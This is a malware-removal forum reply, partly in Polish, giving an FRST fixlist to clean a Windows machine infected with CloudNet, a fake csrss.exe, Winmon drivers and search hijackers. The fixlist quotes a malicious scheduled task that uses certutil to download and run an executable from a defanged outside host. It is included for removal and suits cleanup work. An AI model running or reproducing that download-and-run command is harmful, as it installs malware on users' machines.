In Safe Mode, uninstall CloudNet.

Open the system Notepad and paste:

CloseProcesses:
Task: {099CB0A1-5F8D-433F-9D13-8C9C20E2A3C1} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/3/app.exe C:\Users\1\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\1\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
Task: {79399915-A605-4616-B5EF-6DCA6FF42F2D} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-05] () <==== UWAGA
Task: {BB56134F-EDEA-4F4C-AE37-BE564F9BF9B2} - \uxjyr -> Brak pliku <==== UWAGA
Task: {DE006AF9-0FD2-47B3-9E08-ACEFF3B3E01B} - System32\Tasks\{C9D64427-0B8B-4203-8B0A-C07923397C91} => C:\Windows\system32\pcalua.exe -a D:\Setup.exe -d D:\
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
HKU\S-1-5-21-3800236265-2849643086-1748996452-1000\...\Run: [BrokenDarkness] => C:\Windows\rss\csrss.exe [3047424 2018-06-05] () <==== UWAGA
HKU\S-1-5-21-3800236265-2849643086-1748996452-1000\...\Run: [CloudNet] => C:\Users\1\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-05] (EpicNet Inc.) <==== UWAGA
HKU\S-1-5-21-3800236265-2849643086-1748996452-1000\...\MountPoints2: {3762f577-8a37-11e7-a804-4ccc6a2bfc3f} - F:\HiSuiteDownLoader.exe
GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-3800236265-2849643086-1748996452-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7mRpjVF4fT4KBExoHyct6E2cT1snesK3xZl6yMY9wbOyytcna6ZW-fc6N8UgrfNkFriAjrzPOJfRlcuJ0JGlNwUhbVJn9S7WBs1OMeEtuBW7BlD7pKAnryujMDM4GukLwxqZ_Q8PdC0MsdD1x5t4buBHkyA,,&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
FF Extension: (Brak nazwy) - C:\Program Files\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi [2018-05-20] [Brak podpisu cyfrowego]
CHR DefaultSearchURL: Default -> hxxps://feed.bazzsearch.com/?fext=true&publisherid=51206&publisher=defaultbazz&st=ed&q={searchTerms}
CHR DefaultSearchKeyword: Default -> Bazz Search
CHR Extension: (Bazz Search) - C:\Users\1\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2018-05-20]
CHR Extension: (Brak nazwy) - C:\Users\1\AppData\Local\Google\Chrome\User Data\Default\Extensions\odcmcehfddfnnnbaifjhkikddagchieg [2018-05-20]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
R2 TCPSvc; "C:\Users\1\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\1\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\1\AppData\Local\Temp\csrss\proxy\t" <==== UWAGA
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== UWAGA (zerobajtowy plik/folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-06-05] () [Brak podpisu cyfrowego] <==== UWAGA
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
S4 NVHDA; system32\drivers\nvhda64v.sys [X]
S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X]
S4 nvvhci; system32\DRIVERS\nvvhci.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
2018-06-05 08:54 - 2018-06-05 08:54 - 000000000 ____D C:\Users\1\AppData\Roaming\EpicNet Inc
2018-05-20 10:27 - 2018-05-20 10:27 - 007611392 _____ () C:\Users\1\AppData\Local\agent.dat
2018-05-20 10:27 - 2018-05-20 10:27 - 001895381 _____ () C:\Users\1\AppData\Local\Airfax.bin
2018-05-20 10:27 - 2018-05-20 10:27 - 000070896 _____ () C:\Users\1\AppData\Local\Config.xml
2018-05-20 10:27 - 2018-05-20 10:27 - 000140800 _____ () C:\Users\1\AppData\Local\installer.dat
2018-05-20 10:27 - 2018-05-20 10:27 - 000005568 _____ () C:\Users\1\AppData\Local\md.xml
2018-05-20 10:27 - 2018-05-20 10:27 - 000126464 _____ () C:\Users\1\AppData\Local\noah.dat
2018-05-20 10:27 - 2018-05-20 10:35 - 000929792 _____ () C:\Users\1\AppData\Local\sham.db
2018-05-20 10:27 - 2018-05-20 10:27 - 002136576 _____ (TODO: ) C:\Users\1\AppData\Local\Sontop.exe
2018-05-20 10:27 - 2018-05-20 10:27 - 000278511 _____ () C:\Users\1\AppData\Local\Sontop.tst
2018-05-20 10:27 - 2018-05-20 10:27 - 002136576 _____ (TODO: ) C:\Users\1\AppData\Local\Tontip.exe
2018-05-20 10:27 - 2018-05-20 10:27 - 001987160 _____ () C:\Users\1\AppData\Local\Tontip.tst
2018-05-20 10:27 - 2018-05-20 10:27 - 000032038 _____ () C:\Users\1\AppData\Local\uninstall_temp.ico
C:\Windows\rss\csrss.exe
C:\Users\1\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
EmptyTemp:

Save the file as fixlist.txt and place it next to FRST in the same folder. Run FRST as administrator and click Fix/Napraw. Post the new FRST logs.